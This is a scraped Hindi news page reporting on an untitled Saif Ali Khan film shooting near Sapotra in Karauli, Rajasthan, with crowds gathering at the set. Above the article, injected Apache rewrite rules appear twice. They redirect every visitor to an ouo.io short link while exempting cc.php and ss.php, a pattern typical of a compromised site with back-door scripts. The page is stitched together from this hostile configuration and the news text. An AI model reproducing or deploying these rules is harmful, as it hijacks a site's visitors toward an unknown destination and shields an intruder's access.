
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 430
Previous Nextसपोटरा। राजस्थान में करौली जिले के सपोटरा क्षेत्र के बीहड़ों में इन दिनों फिल्म अभिनेता सैफ अली खान की एक अनाम फिल्म की शूटिंग चल रही है। करीब एक माह से दौलतपुरा गांव के बंगलाकी जंगल में विभिन्न स्थानों पर फिल्म के सेट लगाए गए हैं और मूवी की कई दृश्य शूट किए गए हैं। फिल्म की शूटिंग की जानकारी जैसे ही जिले में फैली तो सैफ अली खान को देखने की चाहत में लोगों का हुजूम शूटिंग स्थल पर उमड़ा पड़ा। इस भीड़ को रोकने के लिए खासी मशक्कत करनी पड़ी। यूनिट के सुरक्षाकर्मियों ने युवाओं की भीड़ को शूटिंग पॉइन्ट से करीब दौ मीटर दूर रोककर खदेड़ दिया।
जानकारी के अनुसार शूटिंग 21 मार्च तक चलेगी। कहा जा रहा है कि इस फिल्म सैफ अली खान डकैत के वेश में शूटिंग कर रहे हैं। जिससे अनुमान लगाया जा रहा कि फिल्म बीहड़ के डाकुओं पर बन रही होगी। फिल्म की यूनिट रामठरा फोर्ट में ठहरी हुई है। फिल्म की शूटिंग करने की चर्चा क्षेत्र में कई दिनों से चल रही थी। लेकिन, जब से फिल्म में सैफ अली खान के होने की जानकारी मिली है तब से काफी संख्या में युवाओं की टोलियां इस ओर आ रही हैं। भीड़ के हुल्लड़ करने से फिल्म यूनिट के सदस्यों को परेशानी उठानी पड़ रही है।